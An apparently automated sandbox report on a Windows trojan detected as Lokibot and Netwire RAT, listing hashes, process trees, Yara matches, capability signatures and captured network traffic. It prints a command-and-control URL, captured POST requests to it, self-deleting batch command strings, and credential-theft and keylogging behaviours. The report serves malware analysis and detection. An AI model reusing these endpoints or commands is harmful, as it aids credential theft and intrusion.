
Analysis Report SecuriteInfo.com.Trojan.MulDrop.1161.895.14575

Overview

General Information

Sample Name: SecuriteInfo.com.Trojan.MulDrop.1161.895.14575 (renamed file extension from 14575 to exe)
Analysis ID: 255718
MD5: 32ffae9524a6321051248e4313c91852
SHA1: 5e28c29f740842a5eee6f2717d25f86dd3b0f752
SHA256: 6a223f3097e572a00aa6f1029bbbb6d71d66bb5bbf239177d232dca3c7f9bf33


Detection

Lokibot, Netwire
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected Lokibot
Yara detected Netwire RAT
.NET source code contains potential unpacker
Contains functionality to log keystrokes
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • SecuriteInfo.com.Trojan.MulDrop.1161.895.exe (PID: 6996 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop.1161.895.exe' MD5: 32FFAE9524A6321051248E4313C91852)
    • RegAsm.exe (PID: 7036 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe MD5: 529695608EAFBED00ACA9E61EF333A7C)
      • build.exe (PID: 7104 cmdline: 'C:\Users\user\AppData\Local\Temp\build.exe' MD5: 11630FB6894211BACABD49F2B7BE8513)
      • StartUpHost.exe (PID: 7124 cmdline: 'C:\Users\user\AppData\Local\Temp\StartUpHost.exe' MD5: E939EF01439E8B274C590FAF397471F2)
        • Host.exe (PID: 7148 cmdline: C:\Users\user\AppData\Roaming\Install\Host.exe MD5: E939EF01439E8B274C590FAF397471F2)
  • Host.exe (PID: 5832 cmdline: 'C:\Users\user\AppData\Roaming\Install\Host.exe' MD5: E939EF01439E8B274C590FAF397471F2)
  • Host.exe (PID: 6772 cmdline: 'C:\Users\user\AppData\Roaming\Install\Host.exe' MD5: E939EF01439E8B274C590FAF397471F2)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"c2:": "http://dresson1.com/wip-admin/js/Panel/five/fre.php"}

Yara Overview

Dropped Files

Source | Rule | Description | Author (matched strings are listed under each row)
C:\Users\user\AppData\Roaming\Install\Host.exe | Suspicious_BAT_Strings | Detects a string also used in Netwire RAT auxilliary | Florian Roth
  • 0x1cb4b:$s1: ping 192.0.2.2 -n 1
C:\Users\user\AppData\Roaming\Install\Host.exe | Malicious_BAT_Strings | Detects a string also used in Netwire RAT auxilliary | Florian Roth
  • 0x1cb87:$s1: call :deleteSelf&exit /b
C:\Users\user\AppData\Roaming\Install\Host.exe | MAL_unspecified_Jan18_1 | Detects unspecified malware sample | Florian Roth
  • 0x1d65c:$s1: User-Agent: Mozilla/4.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
  • 0x1cb4b:$s2: ping 192.0.2.2 -n 1 -w %d >nul 2>&1
  • 0x1d764:$s3: [Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]
  • 0x1cbae:$s4: start /b "" cmd /c del "%%~f0"&exit /b
  • 0x1d798:$s5: [%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]
  • 0x1d54f:$s6: %s\%s.bat
  • 0x1cb70:$s7: DEL /s "%s" >nul 2>&1
C:\Users\user\AppData\Roaming\Install\Host.exe | JoeSecurity_Netwire | Yara detected Netwire RAT | Joe Security
C:\Users\user\AppData\Roaming\Install\Host.exe | netwire | detect netwire in memory | JPCERT/CC Incident Response Group
  • 0x1cb4b:$ping: ping 192.0.2.2
  • 0x1d764:$log: [Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]
(10 entries in total; only the first five are shown above)

Memory Dumps

Source | Rule | Description | Author (matched strings are listed under each row)
00000004.00000002.492113138.000000000041E000.00000004.00020000.sdmp | Suspicious_BAT_Strings | Detects a string also used in Netwire RAT auxilliary | Florian Roth
  • 0x34b:$s1: ping 192.0.2.2 -n 1
00000004.00000002.492113138.000000000041E000.00000004.00020000.sdmp | Malicious_BAT_Strings | Detects a string also used in Netwire RAT auxilliary | Florian Roth
  • 0x387:$s1: call :deleteSelf&exit /b
00000004.00000002.492113138.000000000041E000.00000004.00020000.sdmp | MAL_unspecified_Jan18_1 | Detects unspecified malware sample | Florian Roth
  • 0xe5c:$s1: User-Agent: Mozilla/4.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
  • 0x34b:$s2: ping 192.0.2.2 -n 1 -w %d >nul 2>&1
  • 0xf64:$s3: [Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]
  • 0x3ae:$s4: start /b "" cmd /c del "%%~f0"&exit /b
  • 0xf98:$s5: [%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]
  • 0xd4f:$s6: %s\%s.bat
  • 0x370:$s7: DEL /s "%s" >nul 2>&1
00000004.00000002.492113138.000000000041E000.00000004.00020000.sdmp | JoeSecurity_Netwire | Yara detected Netwire RAT | Joe Security
00000004.00000002.492113138.000000000041E000.00000004.00020000.sdmp | netwire | detect netwire in memory | JPCERT/CC Incident Response Group
  • 0x34b:$ping: ping 192.0.2.2
  • 0xf64:$log: [Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]
(71 entries in total; only the first five are shown above)

Unpacked PEs

Source | Rule | Description | Author (matched strings are listed under each row)
11.2.Host.exe.400000.0.unpack | Suspicious_BAT_Strings | Detects a string also used in Netwire RAT auxilliary | Florian Roth
  • 0x1cb4b:$s1: ping 192.0.2.2 -n 1
11.2.Host.exe.400000.0.unpack | Malicious_BAT_Strings | Detects a string also used in Netwire RAT auxilliary | Florian Roth
  • 0x1cb87:$s1: call :deleteSelf&exit /b
11.2.Host.exe.400000.0.unpack | MAL_unspecified_Jan18_1 | Detects unspecified malware sample | Florian Roth
  • 0x1d65c:$s1: User-Agent: Mozilla/4.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
  • 0x1cb4b:$s2: ping 192.0.2.2 -n 1 -w %d >nul 2>&1
  • 0x1d764:$s3: [Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]
  • 0x1cbae:$s4: start /b "" cmd /c del "%%~f0"&exit /b
  • 0x1d798:$s5: [%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]
  • 0x1d54f:$s6: %s\%s.bat
  • 0x1cb70:$s7: DEL /s "%s" >nul 2>&1
11.2.Host.exe.400000.0.unpack | JoeSecurity_Netwire | Yara detected Netwire RAT | Joe Security
11.2.Host.exe.400000.0.unpack | netwire | detect netwire in memory | JPCERT/CC Incident Response Group
  • 0x1cb4b:$ping: ping 192.0.2.2
  • 0x1d764:$log: [Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]
(44 entries in total; only the first five are shown above)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: build.exe.7104.2.memstr | Malware Configuration Extractor: Lokibot {"c2:": "http://dresson1.com/wip-admin/js/Panel/five/fre.php"}
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Install\Host.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\build.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: SecuriteInfo.com.Trojan.MulDrop.1161.895.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exe | Code function: 3_2_00415034 CryptUnprotectData,LocalFree
Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exe | Code function: 3_2_00413125 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext
Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exe | Code function: 3_2_00411F98 RegOpenKeyExA,RegOpenKeyExA,CryptUnprotectData,LocalFree,RegCloseKey,RegEnumKeyExA,RegCloseKey,RegOpenKeyExA,RegOpenKeyExA,CryptUnprotectData,LocalFree,RegCloseKey,RegEnumKeyExA,RegCloseKey
Source: C:\Users\user\AppData\Roaming\Install\Host.exe | Code function: 6_2_00415034 CryptUnprotectData,LocalFree
Source: C:\Users\user\AppData\Roaming\Install\Host.exe | Code function: 6_2_00413125 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext
Source: C:\Users\user\AppData\Roaming\Install\Host.exe | Code function: 6_2_00411F98 RegOpenKeyExA,RegOpenKeyExA,CryptUnprotectData,LocalFree,RegCloseKey,RegEnumKeyExA,RegCloseKey,RegOpenKeyExA,RegOpenKeyExA,CryptUnprotectData,LocalFree,RegCloseKey,RegEnumKeyExA,RegCloseKey
Source: C:\Users\user\AppData\Local\Temp\build.exe | Code function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW
Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exe | Code function: 3_2_0040A146 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exe | Code function: 3_2_0041BD01 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exe | Code function: 3_2_00414109 SetErrorMode,FindFirstFileA,strlen,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exe | Code function: 3_2_004095ED SetErrorMode,FindFirstFileA,FileTimeToSystemTime,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exe | Code function: 3_2_00409ABC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Roaming\Install\Host.exe | Code function: 6_2_0040A146 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Roaming\Install\Host.exe | Code function: 6_2_0041BD01 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Roaming\Install\Host.exe | Code function: 6_2_00414109 SetErrorMode,FindFirstFileA,strlen,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Roaming\Install\Host.exe | Code function: 6_2_004095ED SetErrorMode,FindFirstFileA,FileTimeToSystemTime,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Roaming\Install\Host.exe | Code function: 6_2_00409ABC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exe | Code function: 3_2_00409508 GetLogicalDriveStringsA,GetDriveTypeA
Source: global traffic | TCP traffic: 192.168.2.4:49715 -> 91.192.100.3:1199
Source: global traffic | HTTP traffic detected (this request was observed twice):
    POST /wip-admin/js/Panel/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: dresson1.com
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 259B9FA6
    Content-Length: 190
    Connection: close
Source: global traffic | HTTP traffic detected:
    POST /wip-admin/js/Panel/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: dresson1.com
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 259B9FA6
    Content-Length: 163
    Connection: close
Source: unknown | TCP traffic detected without corresponding DNS query: 91.192.100.3 (this event is reported 50 times)
Source: C:\Users\user\AppData\Local\Temp\build.exe | Code function: 2_2_00404ED4 recv
Source: unknown | DNS traffic detected: queries for: dresson1.com
Source: unknown | HTTP traffic detected:
    POST /wip-admin/js/Panel/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: dresson1.com
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 259B9FA6
    Content-Length: 190
    Connection: close
Source: build.exe, 00000002.00000002.239470014.000000000049F000.00000004.00020000.sdmp | String found in binary or memory: http://dresson1.com/wip-admin/js/Panel/five/fre.php
Source: build.exe, 00000002.00000002.239459451.0000000000415000.00000002.00020000.sdmp, build.exe.1.dr | String found in binary or memory: http://www.ibsensoftware.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to log keystrokes
Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exe | Code function: 3_2_0040DB3B GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyboardState,MapVirtualKeyA,ToAscii,GetKeyState,MapVirtualKeyA,GetKeyNameTextA,GetKeyState
Source: C:\Users\user\AppData\Roaming\Install\Host.exe | Code function: 6_2_0040DB3B GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyboardState,MapVirtualKeyA,ToAscii,GetKeyState,MapVirtualKeyA,GetKeyNameTextA,GetKeyState
Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exe | Code function: 3_2_00418E44 GetSystemMetrics,GetSystemMetrics,GetDesktopWindow,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetDIBits,calloc,GetDIBits,ReleaseDC,DeleteDC,DeleteObject
Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exe | Code function: 3_2_0040DB3B GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyboardState,MapVirtualKeyA,ToAscii,GetKeyState,MapVirtualKeyA,GetKeyNameTextA,GetKeyState
Source: Host.exe, 00000004.00000002.492393315.00000000009BA000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: Host.exe, 00000004.00000002.492150861.0000000000424000.00000004.00020000.sdmp | Binary or memory string: GetRawInputData
Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exe | Code function: 3_2_0040DB3B GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyboardState,MapVirtualKeyA,ToAscii,GetKeyState,MapVirtualKeyA,GetKeyNameTextA,GetKeyState
Source: C:\Users\user\AppData\Roaming\Install\Host.exe | Code function: 6_2_0040DB3B GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyboardState,MapVirtualKeyA,ToAscii,GetKeyState,MapVirtualKeyA,GetKeyNameTextA,GetKeyState

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000004.00000002.492113138.000000000041E000.00000004.00020000.sdmp, type: MEMORY | Matched rule: Detects unspecified malware sample | Author: Florian Roth
Source: 00000004.00000002.492113138.000000000041E000.00000004.00020000.sdmp, type: MEMORY | Matched rule: detect netwire in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.230924749.0000000000F9F000.00000004.00000020.sdmp, type: MEMORY | Matched rule: Detects unspecified malware sample | Author: Florian Roth
Source: 00000001.00000002.230924749.0000000000F9F000.00000004.00000020.sdmp, type: MEMORY | Matched rule: detect netwire in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.271949091.000000000041E000.00000004.00020000.sdmp, type: MEMORY | Matched rule: Detects unspecified malware sample | Author: Florian Roth
Source: 0000000B.00000002.271949091.000000000041E000.00000004.00020000.sdmp, type: MEMORY | Matched rule: detect netwire in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000000.271440623.000000000041E000.00000008.00020000.sdmp, type: MEMORY | Matched rule: Detects unspecified malware sample | Author: Florian Roth
Source: 0000000B.00000000.271440623.000000000041E000.00000008.00020000.sdmp, type: MEMORY | Matched rule: detect netwire in memory | Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.232283165.0000000000F30000.00000004.00000040.sdmp, type: MEMORY | Matched rule: Detects unspecified malware sample | Author: Florian Roth
Source: 00000003.00000002.232283165.0000000000F30000.00000004.00000040.sdmp, type: MEMORY | Matched rule: detect netwire in memory | Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.231241127.000000000041E000.00000008.00020000.sdmp, type: MEMORY | Matched rule: Detects unspecified malware sample | Author: Florian Roth
Source: 00000004.00000000.231241127.000000000041E000.00000008.00020000.sdmp, type: MEMORY | Matched rule: detect netwire in memory | Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.253998973.000000000041E000.00000008.00020000.sdmp, type: MEMORY | Matched rule: Detects unspecified malware sample | Author: Florian Roth
Source: 00000006.00000000.253998973.000000000041E000.00000008.00020000.sdmp, type: MEMORY | Matched rule: detect netwire in memory | Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.231997731.000000000041E000.00000004.00020000.sdmp, type: MEMORY | Matched rule: Detects unspecified malware sample | Author: Florian Roth
Source: 00000003.00000002.231997731.000000000041E000.00000004.00020000.sdmp, type: MEMORY | Matched rule: detect netwire in memory | Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.230213286.000000000041E000.00000008.00020000.sdmp, type: MEMORY | Matched rule: Detects unspecified malware sample | Author: Florian Roth
Source: 00000003.00000000.230213286.000000000041E000.00000008.00020000.sdmp, type: MEMORY | Matched rule: detect netwire in memory | Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.254616303.000000000041E000.00000004.00020000.sdmp, type: MEMORY | Matched rule: Detects unspecified malware sample | Author: Florian Roth
Source: 00000006.00000002.254616303.000000000041E000.00000004.00020000.sdmp, type: MEMORY | Matched rule: detect netwire in memory | Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Host.exe PID: 7148, type: MEMORY | Matched rule: Detects unspecified malware sample | Author: Florian Roth
Source: Process Memory Space: Host.exe PID: 7148, type: MEMORY | Matched rule: detect netwire in memory | Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Host.exe PID: 5832, type: MEMORY | Matched rule: Detects unspecified malware sample | Author: Florian Roth
Source: Process Memory Space: Host.exe PID: 5832, type: MEMORY | Matched rule: detect netwire in memory | Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: StartUpHost.exe PID: 7124, type: MEMORY | Matched rule: Detects unspecified malware sample | Author: Florian Roth
Source: Process Memory Space: StartUpHost.exe PID: 7124, type: MEMORY | Matched rule: detect netwire in memory | Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Host.exe PID: 6772, type: MEMORY | Matched rule: Detects unspecified malware sample | Author: Florian Roth
Source: Process Memory Space: Host.exe PID: 6772, type: MEMORY | Matched rule: detect netwire in memory | Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Roaming\Install\Host.exe, type: DROPPED | Matched rule: Detects unspecified malware sample | Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\Install\Host.exe, type: DROPPED | Matched rule: detect netwire in memory | Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exe, type: DROPPED | Matched rule: Detects unspecified malware sample | Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exe, type: DROPPED | Matched rule: detect netwire in memory | Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED | Matched rule: Loki Payload | Author: kevoreilly
Source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 11.2.Host.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects unspecified malware sample | Author: Florian Roth
Source: 11.2.Host.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect netwire in memory | Author: JPCERT/CC Incident Response Group
Source: 2.0.build.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
Source: 2.0.build.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 6.0.Host.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects unspecified malware sample | Author: Florian Roth
Source: 6.0.Host.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect netwire in memory | Author: JPCERT/CC Incident Response Group
Source: 4.0.Host.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects unspecified malware sample | Author: Florian Roth
Source: 4.0.Host.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect netwire in memory | Author: JPCERT/CC Incident Response Group
Source: 3.0.StartUpHost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects unspecified malware sample | Author: Florian Roth
Source: 3.0.StartUpHost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect netwire in memory | Author: JPCERT/CC Incident Response Group
Source: 4.2.Host.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects unspecified malware sample | Author: Florian Roth
Source: 4.2.Host.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect netwire in memory | Author: JPCERT/CC Incident Response Group
Source: 3.2.StartUpHost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects unspecified malware sample | Author: Florian Roth
Source: 3.2.StartUpHost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect netwire in memory | Author: JPCERT/CC Incident Response Group
Source: 2.2.build.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
Source: 2.2.build.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 11.0.Host.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects unspecified malware sample | Author: Florian Roth
Source: 11.0.Host.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect netwire in memory | Author: JPCERT/CC Incident Response Group
Source: 6.2.Host.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects unspecified malware sample | Author: Florian Roth
Source: 6.2.Host.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect netwire in memory | Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop.1161.895.exe | File created: C:\Windows\assembly\Desktop.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop.1161.895.exe | Code function: 0_2_056F0EAC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 1_2_0040119D
Source: C:\Users\user\AppData\Local\Temp\build.exe | Code function: 2_2_0040549C
Source: C:\Users\user\AppData\Local\Temp\build.exe | Code function: 2_2_004029D4
Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exe | Code function: 3_2_00410066
Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exe | Code function: 3_2_0040F034
Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exe | Code function: 3_2_00403C38
Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exe | Code function: 3_2_004045D9
Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exe | Code function: 3_2_004035B0
Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exe | Code function: 3_2_00403F2F
Source: C:\Users\user\AppData\Roaming\Install\Host.exe | Code function: 6_2_00410066
Source: C:\Users\user\AppData\Roaming\Install\Host.exe | Code function: 6_2_0040F034
Source: C:\Users\user\AppData\Roaming\Install\Host.exe | Code function: 6_2_00403C38
Source: C:\Users\user\AppData\Roaming\Install\Host.exe | Code function: 6_2_004045D9
Source: C:\Users\user\AppData\Roaming\Install\Host.exe | Code function: 6_2_004035B0
Source: C:\Users\user\AppData\Roaming\Install\Host.exe | Code function: 6_2_00403F2F
Source: C:\Users\user\AppData\Local\Temp\build.exe | Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\AppData\Local\Temp\build.exe | Code function: String function: 00405B6F appears 41 times
Source: SecuriteInfo.com.Trojan.MulDrop.1161.895.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.Trojan.MulDrop.1161.895.exe, 00000000.00000002.226356143.0000000000F5A000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameHD-ApkHandler.exe8 vs SecuriteInfo.com.Trojan.MulDrop.1161.895.exe
Source: SecuriteInfo.com.Trojan.MulDrop.1161.895.exe, 00000000.00000002.229075360.00000000057B0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs SecuriteInfo.com.Trojan.MulDrop.1161.895.exe
Source: SecuriteInfo.com.Trojan.MulDrop.1161.895.exe | Binary or memory string: OriginalFilenameHD-ApkHandler.exe8 vs SecuriteInfo.com.Trojan.MulDrop.1161.895.exe
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Section loaded: sfc.dll
        Source: 00000004.00000002.492113138.000000000041E000.00000004.00020000.sdmp, type: MEMORY | Matched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 00000004.00000002.492113138.000000000041E000.00000004.00020000.sdmp, type: MEMORY | Matched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 00000004.00000002.492113138.000000000041E000.00000004.00020000.sdmp, type: MEMORY | Matched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000004.00000002.492113138.000000000041E000.00000004.00020000.sdmp, type: MEMORY | Matched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: 00000001.00000002.230924749.0000000000F9F000.00000004.00000020.sdmp, type: MEMORY | Matched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 00000001.00000002.230924749.0000000000F9F000.00000004.00000020.sdmp, type: MEMORY | Matched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 00000001.00000002.230924749.0000000000F9F000.00000004.00000020.sdmp, type: MEMORY | Matched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000001.00000002.230924749.0000000000F9F000.00000004.00000020.sdmp, type: MEMORY | Matched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000B.00000002.271949091.000000000041E000.00000004.00020000.sdmp, type: MEMORY | Matched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 0000000B.00000002.271949091.000000000041E000.00000004.00020000.sdmp, type: MEMORY | Matched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 0000000B.00000002.271949091.000000000041E000.00000004.00020000.sdmp, type: MEMORY | Matched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000B.00000002.271949091.000000000041E000.00000004.00020000.sdmp, type: MEMORY | Matched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000B.00000000.271440623.000000000041E000.00000008.00020000.sdmp, type: MEMORY | Matched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
